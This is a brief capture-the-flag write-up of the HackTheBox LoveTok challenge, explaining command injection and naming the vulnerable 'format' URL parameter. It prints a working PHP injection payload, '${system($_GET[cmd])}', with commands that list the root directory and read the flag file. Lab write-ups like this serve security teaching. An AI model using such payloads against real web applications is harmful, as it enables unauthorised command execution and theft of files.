We briefly explained command injection as one of the top 10 web application vulnerabilities. Command injection allows an attacker to execute system commands directly from the web browser due to the lack of input valid checks on the backend or the webserver side. We used HackTheBox LoveTok challenge to fully demonstrate this subject.. This was part of HackTheBox LoveTok.

Get OSCP Certificate Notes

The Complete Penetration Testing with BackBox Course

CHALLENGE DESCRIPTION

True love is tough, and even harder to find. Once the sun has set, the lights close and the bell has rung… you find yourself licking your wounds and contemplating human existence. You wish to have somebody important in your life to share the experiences that come with it, the good and the bad. This is why we made LoveTok, the brand new service that accurately predicts in the threshold of milliseconds when love will come knockin’ (at your door). Come and check it out, but don’t try to cheat love because love cheats back. 💛

Video Highlights

In command injection, the attacker-injected code gets executed by the underlying OS allowing the attacker to execute system commands to discover sensitive files, navigate through the directory structure, create files and of course plant reverse shells and backdoors. In verbose command injection, the output is returned to the user where a decision can be formed if the system is vulnerable to command injection.

In the challenge, we inject the “format” parameter in the URL below

http://IP:PORT/?format=r

We used the below webshell to achieve command injection

${system($_GET[cmd])}&cmd=ls /

And to retrieve the flag just type

${system($_GET[cmd])}&cmd=cat /flagname

Video Walkthrough

About the Author

Cybersecurity Trainer MS in Cybersecurity Expertise in Healthcare and Finance Industries Penetration tester and compliance auditor

View Articles